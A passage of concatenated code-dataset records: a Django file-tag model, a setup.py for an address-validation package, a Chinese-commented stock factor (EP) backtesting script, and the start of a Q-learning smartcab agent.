models.CharField(max_length=128)\n file = models.ManyToManyField(\n File,\n through='Membership',\n through_fields=('tag', 'file'),\n )\n\n class Meta:\n\n db_table = \"file_tag\"\n verbose_name = \"文件标签\"\n verbose_name_plural = \"文件标签\"\n\n\nclass Membership(models.Model):\n nid = models.AutoField(primary_key=True)\n tag = models.ForeignKey(FileTag, on_delete=models.CASCADE)\n file = models.ForeignKey(File, on_delete=models.CASCADE)\n\n class Meta:\n\n db_table = \"file2tag\"\n verbose_name = \"文件|标签关系表\"\n verbose_name_plural = \"文件|标签关系表\"\n\n\n# class Link(models.Model):\n# \"\"\"\n# 记录文件的摘要和links数\n# 当用户删除文件时,删掉文件对象,但是不从磁盘删除,\n# 除非对应的 link 数为0,表示该 hash 值对应的所有文件已经删光,\n# 此时,从磁盘删除文件\n#\n# 每次上传文件必然产生两种情况:\n# 1. 产生一个新的 link 对象\n# 2. links 值 + 1\n#\n# 之前把 links 属性放在 File,有一个问题,当记录 links 的文件被删除时,\n# 这个值就丢失了\n# \"\"\"\n# nid = models.AutoField(primary_key=True)\n# digest = models.CharField(max_length=40, primary_key=True) # 和 digest 绑定,而不是和文件绑定\n# links = models.IntegerField() # links 数\n#\n# class Meta:\n#\n# db_table = \"file_link\"\n# verbose_name = \"文件引用计数\"\n# verbose_name_plural = \"文件引用计数\"\n#\n# def __str__(self):\n# return str(self.links)\n#\n# @classmethod\n# def add_one(cls, file):\n# \"\"\"\n# 新增文件后调用。使得计数器加一\n# 如果对应的 digest 没有计数器,则创建计数器,并 links = 1\n# \"\"\"\n# nums = File.objects.filter(digest=file.digest).count()\n# link_objects = cls.objects.filter(digest=file.digest)\n# if link_objects:\n# link = link_objects[0]\n# link.links = nums\n# link.save()\n# else:\n# link = cls.objects.create(digest=file.digest, links=nums) # nums 为1\n#\n# @classmethod\n# def minus_one(cls, file):\n# \"\"\"\n# 删除文件后调用。使得计数器减一\n# 如果对应的 digest 的计数器为 0,那么从磁盘删除掉这个文件\n# \"\"\"\n# link = cls.objects.get(digest=file.digest)\n# link.links -= 1\n#\n# if link.links < 1:\n# file.remove_from_disk()\n# link.delete()\n# else:\n# link.save()\n#\n# file.delete()","sub_path":"apps/file/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"281214525","text":"#! 
/usr/bin/env python\nimport logging\nfrom setuptools import setup, find_packages, Command\n\n\nclass DownloadJSONFiles(Command):\n\n description = 'Download all addresses data from Google i18n API'\n user_options = []\n logger = None\n\n def initialize_options(self):\n logging.basicConfig()\n self.logger = logging.getLogger('i18naddress.downloader')\n self.logger.setLevel(logging.DEBUG)\n\n def finalize_options(self):\n pass\n\n def run(self):\n from i18naddress.downloader import download\n download()\n\nsetup(\n name='google-i18n-address',\n author='Mirumee Software',\n author_email='hello@mirumee.com',\n description='Address validation helpers for Google\\'s i18n address database', # noqa\n license='BSD',\n version='1.0.3',\n url='https://github.com/mirumee/google-i18n-address',\n packages=find_packages(),\n include_package_data=True,\n install_requires=[\n 'requests>=2.7.0',\n ],\n cmdclass={'update_validation_files': DownloadJSONFiles},\n zip_safe=False\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"253341039","text":"# coding:utf-8 \n\"\"\"\nauthor:Sam\ndate:2021/2/1\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport scipy.io\nfrom scipy import stats\nimport time\nimport math\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nfrom collections import Counter\n\n# 计时开始\n# time_start = time.time()\n\n\n# 第一步:数据读取/输入\n# 1.1 mat文件数据读取(已有因子值)\nDayPrice_stock = scipy.io.loadmat('D:\\\\pycharm project\\\\factor_testing\\\\DayPrice_Stock.mat') # 输入因子值文件\nfactor1 = scipy.io.loadmat('D:\\\\pycharm project\\\\factor_testing\\\\MV.mat') # 输入因子值文件\nindustry = scipy.io.loadmat('D:\\\\pycharm project\\\\factor_testing\\\\CSLv1.mat')\n\n# 1.2 CSV文件数据读取(已有因子值)\n# DayPrice_stock = pd.read_csv('DayPrice_Stock.csv')\n# factor = pd.read_csv('D:\\\\pycharm project\\\\factor_testing\\\\factor.csv') # 输入因子值文件\n# industry = pd.read_csv('CSLv1.csv')\n\n# 1.3 因子值计算(未有因子值,需要通过计算得到)\n# 归母净利润TTM(季频转日频)\nfactor2=scipy.io.loadmat('NPParentCompanyOwners.mat')\ntime=factor2['Report_dates_num'].reshape(1,-1)[0]\ntime=pd.to_datetime(time-719529, unit='D')\nstockName=[]\nfor i in factor2['RICs'].reshape(1,-1)[0]:\n stockName.append(i[0])\nprofit=pd.DataFrame(factor2['NPParentCompanyOwners_TTM'],index=time,columns=stockName)\n\n# 将季度报日期转为证监会规定的财报披露的最后一天。输入季频数据,输出季频数据\ndef statementDatesDeal(data):\n dates=data.index\n datesNew=[]\n #由于年报与一季度报的披露最晚日期都是4/30,我们删除较旧的12/31的数据\n for date in dates[:-1]:\n d=str(date)[:10]\n if d[5:]==\"03-31\":\n datesNew.append(d[:5]+\"4-30\")\n if d[5:]==\"06-30\":\n datesNew.append(d[:5]+\"8-30\")\n if d[5:]==\"09-30\":\n datesNew.append(d[:5]+\"10-31\")\n if d[5:]==\"12-31\":\n data=data.drop(date,axis=0)\n #最后一天如果是12/31,则不用删,用其作为第二年\n for date in [dates[-1]]:\n d=str(date)[:10]\n if d[5:]==\"03-31\":\n datesNew.append(d[:5]+\"4-30\")\n if d[5:]==\"06-30\":\n datesNew.append(d[:5]+\"8-30\")\n if d[5:]==\"09-30\":\n datesNew.append(d[:5]+\"10-31\")\n if d[5:]==\"12-31\":\n datesNew.append(str(int(d[:4])+1)+\"-\"+\"4-30\")\n data.index=pd.to_datetime(datesNew)\n return data\n\n#季度频率变日频\ndef to_daily_freq(quarter,trade_date):\n dates_q = pd.to_datetime(quarter.index)\n dates_d = pd.to_datetime(trade_date)\n df = pd.DataFrame(None,index=dates_d,columns=quarter.columns)\n count = 0\n for i in df.index:\n if (i>= dates_q[count]) & (i< dates_q[count+1]):\n df.loc[i] = quarter.iloc[count]\n else:\n count = count+1\n df.loc[i] = 
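The custom DownloadJSONFiles command in the setup.py above simply delegates to the package's own downloader, so the same refresh can be triggered either through setuptools or directly from Python (requires network access and the package on the path):

# equivalent to running: python setup.py update_validation_files
from i18naddress.downloader import download
download()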
quarter.iloc[count]\n return df\n\n\n\n\n# 第二步:数据预处理\n# 2.1 mat格式数据处理\n# 将array序列转为list\ndef array_to_list(factor,column):\n list=[]\n for x in factor[column].reshape(1,-1)[0]:\n x[0] = str(x[0]) # 这里再研究一下\n list.append(x[0])\n return list\n\n# 将array序列转为datetime\ndef array_to_datetime(factor,column):\n x = pd.to_datetime(pd.Series(factor[column].flatten()).apply(lambda x:str(x[0])))\n return x\n\n# 将date_num转化为list\ndef datenum_to_list(factor):\n date_num = []\n for x in factor['date_num']:\n date_num.append(x[0])\n return date_num\n\n\n# 2.2 统一日期 日期对齐\n\"\"\" datetime number\nDayPrice_stock: 731220-737859 日度数据(4409)\nfactor: \nindustry: 731583-737860 日度数据(4173)\n\"\"\"\n# date_num 和 date 对应关系\na = array_to_datetime(DayPrice_stock,'date')\nb = datenum_to_list(DayPrice_stock)\ndate = pd.DataFrame(a.values,index = b,columns=['date'])\n# print(date)\n\n# 取三个表的日期交集\n# start_date_num = max(b[0],datenum_to_list(factor1)[0],datenum_to_list(industry)[0])\nstart_date_num = 734142\nend_date_num = min(b[-1],datenum_to_list(factor1)[-1],datenum_to_list(industry)[-1])\ndate = date.loc[start_date_num:end_date_num]\n# print(date)\n\n\n# 2.3\n# 获取股票池收盘价数据\ndef stock(DayPrice_stock):\n stockName = []\n for i in DayPrice_stock['RICs'].reshape(1, -1)[0]:\n stockName.append(i[0])\n price = DayPrice_stock['ClosePrice']\n time = array_to_datetime(DayPrice_stock,'date')\n price = pd.DataFrame(price, columns=stockName, index=time)\n return price\n\n\n# 2.4 临时处理函数\n# series删除0\ndef drop_zero(series):\n dict = {}\n for x,y in series.items():\n if y == 0:\n continue\n else:\n dict['x'] = y\n new_series = pd.Series(dict)\n return new_series\n\n\n# 第三步:\n# 3.1 异常值处理:MAD中位数去极值法\ndef filter_extreme_MAD(series,n=3*1.4826):\n median = series.median()\n new_median = ((series - median).abs()).median()\n max_range = median + n*new_median\n min_range = median - n*new_median\n return np.clip(series,min_range,max_range)\n\n# 3.2 行业中性化\n# 获取当日行业标签\ndef get_industry_exposure(stock_list,industry,date):\n df = pd.DataFrame(index=range(1001,1030), columns=stock_list)\n for stock in stock_list:\n label = industry.loc[date][stock]\n try:\n df.loc[label][stock] = 1\n except:\n continue\n return df.fillna(0) # 将NaN赋为0\n\n# 行业中性\n# def neutralization(series,industry_label):\n# date = series.name\n# date = date.strftime('%Y-%m-%d')\n# index = series.dropna().index\n# y = series.dropna()\n# # 这里开始有问题\n# dummy_var = pd.get_dummies(industry_label.loc[date]).drop([0], axis=1)\n# # dummy_var = get_industry_exposure(industry_label.columns, industry_label, date).T\n# x = dummy_var.loc[index]\n# result = sm.OLS(y.astype(float), x.astype(float)).fit()\n# residue = result.resid\n# return residue\n\n# 中性化(行业中性+市值中性)\ndef neutralization(series,industry_label,market_value):\n date = series.name\n date = date.strftime('%Y-%m-%d')\n index = series.dropna().index\n y = series.dropna()\n # print(len(y))\n # 这里开始有问题\n dummy_var = pd.get_dummies(industry_label.loc[date]).drop([0], axis=1)\n # dummy_var = get_industry_exposure(industry_label.columns, industry_label, date).T\n ind_dummy = dummy_var.loc[index]\n # print(len(ind_dummy))\n\n # 对齐处理\n mkt_value = market_value.loc[date]\n mkt_value = mkt_value[index]\n # print(len(mkt_value))\n # 原先的做法 先保留\n # mkt_value = market_value.loc[date].replace(0,np.nan)\n # mkt_value = mkt_value.dropna()\n # print(len(mkt_value))\n\n x = pd.concat([mkt_value,ind_dummy],axis=1) # 市值中性化+行业中性化\n x[np.isnan(x)] = 0\n x[np.isinf(x)] = 0\n result = sm.OLS(y.astype(float), x.astype(float)).fit()\n residue = result.resid\n 
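filter_extreme_MAD above clips each cross-section to median ± n·MAD with n = 3×1.4826; a quick numeric check of the clipping, assuming the function is in scope (values illustrative):

import pandas as pd

s = pd.Series([0.9, 1.0, 1.05, 1.1, 50.0])   # one extreme outlier
clipped = filter_extreme_MAD(s)
# median = 1.05 and MAD = 0.05, so the upper bound is 1.05 + 3*1.4826*0.05 ≈ 1.27;
# 50.0 is clipped down to about 1.27 while the other values pass through unchanged.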
return residue\n\n\n# # 重新填充中性化后的因子值表(行业中性化)\n# def set_new_factor_df(standardize_factor,industry_label):\n# d = []\n# for date in standardize_factor.index:\n# date = date.strftime('%Y-%m-%d')\n# stock_index = standardize_factor.loc[date].dropna().index\n# initList = [[np.nan for x in range(len(standardize_factor.columns))]]\n# temp = pd.DataFrame(initList, columns=standardize_factor.columns)\n# series = neutralization(standardize_factor.loc[date], industry_label)\n# temp[stock_index] = [series.values]\n# d.append(temp.values[0])\n# result = pd.DataFrame(d,index = standardize_factor.index, columns=standardize_factor.columns)\n# return result\n\n# 重新填充中性化后的因子值表(行业+市值中性化)\ndef set_new_factor_df(standardize_factor,industry_label,market_value):\n d = []\n for date in standardize_factor.index:\n date = date.strftime('%Y-%m-%d')\n stock_index = standardize_factor.loc[date].dropna().index\n initList = [[np.nan for x in range(len(standardize_factor.columns))]]\n temp = pd.DataFrame(initList, columns=standardize_factor.columns)\n series = neutralization(standardize_factor.loc[date], industry_label, market_value)\n temp[stock_index] = [series.values]\n d.append(temp.values[0])\n result = pd.DataFrame(d,index = standardize_factor.index, columns=standardize_factor.columns)\n return result\n\n\n\n# 第四步:因子评价体系\n# 4.1 IC评价体系\n# 计算序列大于n的概率\ndef larger_than_prob(series,n):\n count = 0\n for x in series:\n if x >= n:\n count = count+1\n else:\n continue\n prob = count/len(series)\n return prob\n\n# 计算平均年化收益率\ndef annul_return_am(n2,t):\n x = math.pow(math.pow(n2,1/t),240) - 1\n return x\n\n\n# 计算最大回撤率(好像有点问题?)\ndef max_drawback(series):\n series = series.tolist()\n m_drawback = []\n for n in range(0,len(series)):\n find_max = max(series[0:n+1])\n index = series.index(find_max)\n find_min = min(series[index:n+1])\n drawback = (find_max-find_min)/find_max\n m_drawback.append(drawback)\n max_drawback = max(m_drawback)\n # print(m_drawback.index(max_drawback))\n return max_drawback\n\n# 计算夏普比\ndef sharpe_ratio(series,last_value):\n std = series.std() * (240 ** 0.5)\n list = series.tolist()\n r = annul_return_am(last_value,3688)\n sharpe_ratio = r/std\n return sharpe_ratio\n\n# 计算年化波动率\ndef annul_volatility(series):\n std = series.std() * (240 ** 0.5)\n return std\n\n\n\n# 4.2 分组回溯法\n# 将传入的股票池list分为5个等长度的组合\ndef div_group(series):\n series = series.dropna()\n # print(\"当前调仓日可交易股票总数量为:\" + str(len(series)))\n k = len(series) % 5 #求余\n new_series = series.sort_values()[0:len(series)-k]\n num_single_group = len(new_series) / 5\n # print(\"每一组的长度为:\" + str(num_single_group))\n new_series_index = new_series.index.to_list()\n num_single_group = int(num_single_group)\n group1 = new_series_index[0:num_single_group] # 因子值最小的组\n group2 = new_series_index[num_single_group:2*num_single_group]\n group3 = new_series_index[2*num_single_group:3*num_single_group]\n group4 = new_series_index[3*num_single_group:4*num_single_group]\n group5 = new_series_index[4*num_single_group:5*num_single_group] # 因子值最大的组\n dict = {'group1':group1,\n 'group2':group2,\n 'group3':group3,\n 'group4':group4,\n 'group5':group5}\n return dict\n\n# 挑选出月调仓日\ndef sel_monthly_trade_date(df,index):\n list = []\n for x in index:\n tempt_df = df.loc[x]\n first_day = tempt_df.iloc[0]\n list.append(first_day.name)\n return list\n\n# 根据股票日收益率计算出复利月收益率\ndef monthly_comp_return(df,index):\n print(\"股票复利月收益率如下:\")\n dict = {}\n for x in index:\n tempt_df = df.loc[x]\n first_day = tempt_df.iloc[0]\n for stock in tempt_df.columns:\n for n in tempt_df.index:\n 
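annul_return_am(n2, t) above annualizes a final net value n2 over t trading days as (n2**(1/t))**240 - 1; a worked check with illustrative numbers:

import math

# net value doubled over 480 trading days:
# (2 ** (1/480)) ** 240 - 1 == 2 ** 0.5 - 1 ≈ 0.414, i.e. about 41.4% per 240-day year
print(math.pow(math.pow(2.0, 1 / 480), 240) - 1)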
first_day[stock] = first_day[stock] * (1 + tempt_df.loc[n][stock])\n dict[x] = first_day\n\n dict = pd.DataFrame(dict)\n return dict\n\n# 获取输入日期对应的当月第一个交易日日期\ndef get_first_day(df,index):\n index = index.strftime('%Y-%m')\n tempt_df = df.loc[index]\n first_day = tempt_df.iloc[0]\n first_day_index = first_day.name\n first_day_index = first_day_index.strftime('%Y-%m-%d')\n return first_day_index\n\n\n\n\nif __name__ == '__main__':\n # EP因子\n print(\"-------------EP因子测试开始----------\")\n # 市值MV\n f_date_number = datenum_to_list(factor1)\n new_date = date\n factor1 = pd.DataFrame(factor1['MV'],columns=array_to_list(factor1,'RICs')) # 读取MV因子值\n factor1 = factor1[0:len(new_date)]\n factor1.index = new_date['date']\n stocks=factor1.columns & stock(DayPrice_stock).columns # 取原股票池和市值因子MV股票池的交集\n factor1=factor1[stocks]\n # print(\"取股票池交集后,市值因子MV的因子DateFrame如下:\")\n # print(factor1) # 初始因子值DataFrame\n # print(\"总期数:\"+str(len(factor1)))\n # print(\"股票池数量:\"+str(len(factor1.columns)))\n\n\n # 归母净利润TTM因子\n factor2 = to_daily_freq(statementDatesDeal(profit[10:]),date['date'])\n # print(factor2)\n\n\n # EP因子\n factor = factor2/factor1\n print(factor)\n\n\n # MAD中位数去极值\n for x in factor.index:\n factor.loc[x] = filter_extreme_MAD(factor.loc[x])\n # print(\"经过中性化去极值后的因子值表:\")\n # print(factor)\n\n\n # Z-score标准化\n # 多加一步 把0替换成NaN\n factor = factor.replace(0, np.nan)\n standardize_factor =pd.DataFrame(stats.zscore(factor,nan_policy='omit',axis=1),columns=factor.columns,index=factor.index)\n # print(\"MAD去极值、Z-score标准化处理后的因子值表:\")\n # print(standardize_factor)\n\n\n # 行业中性化\n industry_df = industry['CSLv1']\n industry_df = pd.DataFrame(industry_df)\n industry_date_num = datenum_to_list(industry)\n ind_start = industry_date_num.index(start_date_num) + 1\n ind_end = industry_date_num.index(end_date_num) + 2\n industry_label = industry_df.iloc[ind_start:ind_end]\n industry_label.index = standardize_factor.index\n industry_label.columns = standardize_factor.columns\n # print(industry_label)\n\n\n # 行业中性化运算\n # start = time.time()\n print(\"行业中性化开始\")\n new_factor_df = set_new_factor_df(standardize_factor[0:100], industry_label[0:100], factor1[0:100])\n # new_factor_df.to_csv('ep_neu.csv')\n print(\"行业中性化结束\")\n # end = time.time()\n\n\n\n # 直接读取行业中性化结果\n # print(\"行业中性化后的因子值表:\")\n # new_factor_df = pd.read_csv('factor_neu.csv')\n # new_factor_df.index = pd.to_datetime(new_factor_df['date'])\n # new_factor_df = new_factor_df.drop(['date'],axis=1)\n # print(new_factor_df)\n\n\n # 对行业中性化之后的因子值表再做一次Z-score标准化\n new_factor_std_df = pd.DataFrame(stats.zscore(new_factor_df, nan_policy='omit',axis=1), columns=new_factor_df.columns,\n index=new_factor_df.index)\n print(\"再做一次Z-score标准化后得到的因子值表:\")\n print(new_factor_std_df)\n\n\n # 对股票原始价格进行后复权处理,用后复权价计算日收益率\n AF = DayPrice_stock['AF']\n reright_price = stock(DayPrice_stock) * AF\n # print(\"复权后价格:\")\n # print(reright_price)\n stock_return = reright_price.pct_change(periods=1) # 对应的日收益率表(复权价)\n stock_return = stock_return.loc[factor.index]\n stock_return = stock_return.fillna(0)\n print(\"复权价计算的股票池日收益率:\")\n print(stock_return)\n\n\n # 因子评价体系开始\n # 1. 回归法\n factor_return = [] # 因子收益率序列\n t_values = [] # t值序列\n for n in new_factor_std_df.index:\n x = new_factor_std_df.loc[n].dropna()\n y = stock_return.loc[n].dropna()\n index = x.index & y.index\n x = x.loc[index]\n y = y.loc[index]\n x = sm.add_constant(x)\n est = sm.OLS(y,x)\n model = est.fit()\n factor_return.append(model.params[n])\n t_values.append(model.tvalues[n])\n\n print(\"1. 
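div_group, defined earlier, sorts a cross-section by factor value, trims the len % 5 largest leftovers, and splits the rest into five equal buckets; a toy illustration with hypothetical tickers, assuming the function is in scope:

import pandas as pd

factor = pd.Series({'s%d' % i: float(i) for i in range(11)})   # 11 names, factor values 0..10
groups = div_group(factor)
# 11 % 5 == 1, so one name is trimmed and each bucket holds 2 tickers:
# groups['group1'] == ['s0', 's1']   (smallest factor values)
# groups['group5'] == ['s8', 's9']   (largest surviving values)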
回归法\")\n a = larger_than_prob(pd.Series(factor_return),0)\n b = pd.Series(factor_return).mean()\n c = pd.Series(t_values).mean()\n d = larger_than_prob(abs(pd.Series(t_values)),0)\n e = larger_than_prob(abs(pd.Series(t_values)),2)\n print(\"因子收益率大于0的概率:\"+str(a))\n print(\"因子收益率均值:\"+str(b))\n print(\"t值绝对值的均值:\"+str(c))\n print(\"t值绝对值大于0的概率:\"+str(d))\n print(\"t值绝对值大于2的概率:\" + str(e))\n\n\n # 2. IC体系:初步检验\n # normal IC\n normal_IC = [] # normal IC 序列\n count = -1\n for n in new_factor_std_df.index:\n count = count + 1 #目前的位置\n if count != len(new_factor_std_df)-1:\n # x = new_factor_std_df.loc[n].dropna()\n x = new_factor_df.loc[n].dropna()\n y = stock_return.iloc[count+1].dropna()\n index = x.index & y.index\n x = x.loc[index]\n y = y.loc[index]\n df = pd.DataFrame({'factor': x, 'return': y})\n corr_array = df.corr(method='pearson')\n corr = corr_array.loc['factor']['return']\n normal_IC.append(corr)\n else:\n break\n\n print(\"2. IC检验体系:\")\n normal_IC = pd.Series(normal_IC)\n normal_IC_mean = normal_IC.mean()\n normal_IC_std = normal_IC.std()\n normal_IC_IR = normal_IC_mean/normal_IC_std\n a = larger_than_prob(normal_IC,0)\n b = larger_than_prob(abs(normal_IC),0.02)\n print(\"IC均值为:\"+str(normal_IC_mean))\n print(\"IC标准差为:\"+str(normal_IC_std))\n print(\"IC>0的比例:\"+str(a))\n print(\"IC绝对值大于0.02的比例:\"+str(b))\n print(\"IR为:\"+str(normal_IC_IR))\n\n\n # 3. 分组回溯法\n print(\"3. 分组回溯法\")\n # 挑出月调仓日\n tempt = new_factor_std_df.resample('M').sum()\n tempt = tempt.reset_index()\n tempt.index = tempt['date'].apply(lambda x: x.strftime('%Y-%m'))\n monthly_trade_date = sel_monthly_trade_date(new_factor_std_df,tempt.index)\n # print(\"所有月调仓日如下:\")\n # print(monthly_trade_date)\n print(\"回溯期内共交易\"+str(len(monthly_trade_date))+\"次\")\n\n # 存储183次调仓 每次调仓的分组结果\n portfolio = {}\n for n in monthly_trade_date:\n n = n.strftime(\"%Y-%m-%d\")\n x = div_group(new_factor_std_df.loc[n])\n portfolio[n] = x\n\n \"\"\"\n 成功获得在183个月调仓日上根据因子值大小划分的五个组的股票组合\n 存在portfolio字典内 可通过日期调用\n group1因子值最小 group5因子值最大\n \"\"\"\n\n # 计算五个组每日收益率\n new_dict = {}\n daily_date = stock_return.index\n for n in daily_date[0:100]: # 先用调仓日当天测试\n n_firstday = get_first_day(stock_return, n)\n n = n.strftime(\"%Y-%m-%d\")\n list = []\n for s in ['group1','group2','group3','group4','group5']:\n group = portfolio[n_firstday][s]\n group_return = 0\n weight = 1/len(group)\n NaN_stock_return_list = []\n for x in group:\n group_return = group_return + weight * stock_return.loc[n][x] # 将NaN替换成0 跳过if判断条件\n list.append(group_return)\n new_dict[n] = list\n\n\n # 跑数据的时候用\n date_return_df = pd.DataFrame(new_dict,index=['group1','group2','group3','group4','group5'])\n date_return_df.columns.name = 'date'\n date_return_df = date_return_df.T\n date_return_df['top_bottom'] = (date_return_df['group1'] - date_return_df['group5']) / 2\n print(date_return_df)\n # date_return_df.to_csv(\"ep_date_return.csv\")\n date_return_df.index = pd.to_datetime(date_return_df.index)\n\n # date_return_df.index.name = 'date'\n # date_return_df = date_return_df.reindex()\n # print(date_return_df)\n # print(date_return_df.index.dtype)\n\n\n # 直接读取已经跑好的数据\n # date_return_df = pd.read_csv(\"date_return_df_reright.csv\")\n # date_return_df.index = pd.to_datetime(date_return_df['date'])\n # date_return_df = date_return_df.drop('date', axis=1)\n\n\n print(\"各组日收益率表如下:\")\n print(date_return_df)\n print(date_return_df.index.dtype)\n new_date_return_df = date_return_df + 1\n\n # 计算净值变化\n net_value_df = new_date_return_df.copy(deep=True)\n net_value_df['net_value_g1'] = 
net_value_df['group1'].cumprod(axis=0)\n net_value_df['net_value_g2'] = net_value_df['group2'].cumprod(axis=0)\n net_value_df['net_value_g3'] = net_value_df['group3'].cumprod(axis=0)\n net_value_df['net_value_g4'] = net_value_df['group4'].cumprod(axis=0)\n net_value_df['net_value_g5'] = net_value_df['group5'].cumprod(axis=0)\n net_value_df['net_value_tb'] = net_value_df['top_bottom'].cumprod(axis=0)\n # net_value_df['relative_intensity'] = net_value_df['net_value_g1']/net_value_df['net_value_g5']\n # net_value_df.to_csv(\"ep_net_value.csv\")\n net_value_df = net_value_df.drop(['group1','group2','group3','group4','group5','top_bottom'],axis=1)\n print(\"各组净值变化情况如下:\")\n print(net_value_df)\n net_value_df.plot() # 绘制净值曲线图\n plt.show()\n\n length = len(date_return_df)\n annul_return_am_g1 = annul_return_am(net_value_df.iloc[-1]['net_value_g1'],length)\n annul_return_am_g2 = annul_return_am(net_value_df.iloc[-1]['net_value_g2'], length)\n annul_return_am_g3 = annul_return_am(net_value_df.iloc[-1]['net_value_g3'], length)\n annul_return_am_g4 = annul_return_am(net_value_df.iloc[-1]['net_value_g4'], length)\n annul_return_am_g5 = annul_return_am(net_value_df.iloc[-1]['net_value_g5'], length)\n annul_return_am_tb = annul_return_am(net_value_df.iloc[-1]['net_value_tb'], length)\n annul_return_am_list = [annul_return_am_g1,annul_return_am_g2,annul_return_am_g3,annul_return_am_g4,annul_return_am_g5,annul_return_am_tb]\n print(\"各组的平均年化收益率为:\")\n print(annul_return_am_list)\n\n # 计算最大回撤\n m_drawback_g1 = max_drawback(net_value_df['net_value_g1'])\n m_drawback_g2 = max_drawback(net_value_df['net_value_g2'])\n m_drawback_g3 = max_drawback(net_value_df['net_value_g3'])\n m_drawback_g4 = max_drawback(net_value_df['net_value_g4'])\n m_drawback_g5 = max_drawback(net_value_df['net_value_g5'])\n m_drawback_tb = max_drawback(net_value_df['net_value_tb'])\n m_drawback_list = [m_drawback_g1,m_drawback_g2,m_drawback_g3,m_drawback_g4,m_drawback_g5,m_drawback_tb]\n print(\"各组的最大回撤率为:\")\n print(m_drawback_list)\n\n # 计算夏普比\n sharpe_ratio_g1 = sharpe_ratio(date_return_df['group1'],net_value_df.iloc[-1]['net_value_g1'])\n sharpe_ratio_g2 = sharpe_ratio(date_return_df['group2'],net_value_df.iloc[-1]['net_value_g2'])\n sharpe_ratio_g3 = sharpe_ratio(date_return_df['group3'],net_value_df.iloc[-1]['net_value_g3'])\n sharpe_ratio_g4 = sharpe_ratio(date_return_df['group4'],net_value_df.iloc[-1]['net_value_g4'])\n sharpe_ratio_g5 = sharpe_ratio(date_return_df['group5'],net_value_df.iloc[-1]['net_value_g5'])\n sharpe_ratio_tb = sharpe_ratio(date_return_df['top_bottom'], net_value_df.iloc[-1]['net_value_tb'])\n sharpe_ratio_list = [sharpe_ratio_g1,sharpe_ratio_g2,sharpe_ratio_g3,sharpe_ratio_g4,sharpe_ratio_g5,sharpe_ratio_tb]\n print(\"各组的夏普比为:\")\n print(sharpe_ratio_list)\n\n\n\n # time_end = time.time()\n # print('程序运行共需' + str(end - start) + '秒')\n\n\n\n\n\n\n\n","sub_path":"EP.py","file_name":"EP.py","file_ext":"py","file_size_in_byte":23102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"182641857","text":"import random\nfrom environment import Agent, Environment\nfrom planner import RoutePlanner\nfrom simulator import Simulator\nfrom collections import namedtuple\nimport pprint as pp\n\nclass LearningAgent(Agent):\n \"\"\"An agent that learns to drive in the smartcab world.\"\"\"\n\n def __init__(self, env):\n super(LearningAgent, self).__init__(env) # sets self.env = env, state = None, next_waypoint = None, and a default color\n self.color = 'red' # override 
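The net-value columns built here compound daily returns multiplicatively via cumprod; the same operation in isolation:

import pandas as pd

r = pd.Series([0.01, -0.02, 0.03])   # illustrative daily returns
net_value = (1 + r).cumprod()        # 1.0100, 0.9898, 1.0195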
color\n        self.planner = RoutePlanner(self.env, self)  # simple route planner to get next_waypoint\n        # TODO: Initialize any additional variables here\n        self.learningAgentState = namedtuple(\n            'learningAgentState',\n            # ['light', 'light_violation', 'row', 'next_waypoint', 'hurry'])\n            ['light', 'light_violation', 'row', 'next_waypoint'])\n        self.actions = [None, 'forward', 'left', 'right']\n        self.qTable = {}\n        self.logfile = open('c:\\\\agent_log_file'+'.txt', 'w')\n        self.num_moves = 0\n        self.reach_dest = 0\n        self.current_trial = 0\n        self.penalty = 0\n        self.n_trials = 100\n\n        self.alpha = .8\n        self.gamma = .9\n        self.e = .7\n\n\n    def reset(self, destination=None):\n        self.planner.route_to(destination)\n        # TODO: Prepare for a new trip; reset any variables here, if required\n        self.state = self.learningAgentState(light=None, light_violation=None,\n            row=None, next_waypoint=None)\n            # hurry=None)\n\n    @staticmethod\n    def has_right_of_way(inputs, next_waypoint):\n        \"\"\"A static function to check if the agent has right-of-way.\"\"\"\n        if (next_waypoint == 'left' and inputs['light'] == 'green' and inputs['oncoming'] == 'forward'):\n            return 'no_left'\n        elif (next_waypoint == 'right' and inputs['light'] == 'red' and\n                  (inputs['oncoming'] == 'left' or inputs['left'] == 'forward')):\n            return 'no_right'\n        else:\n            return 'has_row'\n\n    @staticmethod\n    def is_violating_light(light, next_waypoint):\n        \"\"\"A static function to check if the agent is violating the traffic signal light.\"\"\"\n        if (light == 'red' and next_waypoint != 'right'):\n            return 1\n        else:\n            return 0\n\n    @staticmethod\n    def is_late(deadline):\n        \"\"\"A static function to check if agent is running out of moves.\"\"\"\n        if deadline < 5:\n            return 1\n        else:\n            return 0\n
\n    def to_action(self, x):\n        \"\"\"Converts a position in the action list to its corresponding action.\"\"\"\n        return {\n            '0': None,\n            '1': 'forward',\n            '2': 'left',\n            '3': 'right'\n        }[x]\n\n    def to_pos(self, x):\n        \"\"\"Converts an action to its corresponding position in the action list.\"\"\"\n        return {\n            'None': 0,\n            'forward': 1,\n            'left': 2,\n            'right': 3\n        }[x]\n\n    def beOptimistic(self, state):\n        \"\"\"Modifies the value of an action to encourage the agent to try it.\"\"\"\n        values = self.qTable[state]\n        m = max(values)\n        for i, v in enumerate(values):\n            if (v == 0):\n                self.qTable[state][i] = m + .05\n                break\n\n    def get_action(self, state):\n        \"\"\"Determines the agent's action: either try an untried action or choose the best previously learned one.\"\"\"\n        try:\n            k=state.index(0)\n            return self.to_action( str(k) )\n        except ValueError:\n            return self.to_action(str(state.index(max(state))))\n\n    # def get_action(self, state):\n    #     curr_e = self.e * ( float(self.n_trials - self.current_trial)/self.n_trials )\n    #     if random.random() > curr_e:\n    #         return self.to_action(str(state.index(max(state))))\n    #     else:\n    #         return random.choice(self.actions)\n
